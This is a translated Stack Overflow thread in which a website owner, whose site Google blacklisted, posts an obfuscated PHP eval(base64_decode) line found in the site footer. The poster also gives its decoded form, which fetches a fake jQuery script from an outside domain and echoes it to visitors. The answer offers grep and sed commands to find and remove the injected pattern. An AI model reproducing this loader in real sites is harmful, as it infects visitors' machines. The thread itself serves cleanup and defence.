这是被谷歌检测为恶意软件的链接的截图:
我正在网站上工作 ExclusivelyHybrid
它有链接到它的 adwords。突然谷歌将该网站列入黑名单,并说他们的服务器被来自该网站的恶意软件攻击。
在网站扫描仪上进行交叉检查,未发现恶意软件。
要求谷歌对其进行扫描,他们也没有在网站上发现任何恶意软件。 然后要求 hostgator 对其进行深度扫描,他们也没有发现任何恶意软件。
Google 同意再次启动 adword 事件,但他们再次受到恶意软件的攻击并将网站列入黑名单。
hostgator 的一名编码人员检查了该站点,发现了 3 个导致问题的链接。
我有链接但是点击它们电脑会被感染(我应该在这里分享链接吗?)
我已经搜索了整个源代码和站点的所有 javascript,没有找到这样的链接。
任何人都可以提供有关这些链接可以放在何处以及在哪些文件中的建议吗?
这是我在网站页脚中找到的内容:
<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>
它解码为:
if(function_exists('curl_init'))
{
$url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
最佳答案
不要使用网站扫描仪。它们无法正常工作。 您必须查看您的访问日志。
在查看日志之前,您可以使用 shell。 搜索此字符串:
rgrep 'eval(gzinflate(base64_decode' * -l
如果你找到了一些东西,你可以用这个字符串删除它:
查找 ./-type f -exec sed -i '/eval(gzinflate(base64_decode/d' {}\;
删除访问日志后,重新启动 apache,如果恶意软件又回来了,请查看访问日志。 在我的例子中,恶意软件就在那里:
[30/Jul/2015:11:57:13 +0200] "POST/wp-content/themes/skeleton/404.php
关于javascript - 谷歌标记的网站中的恶意软件,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/31826863/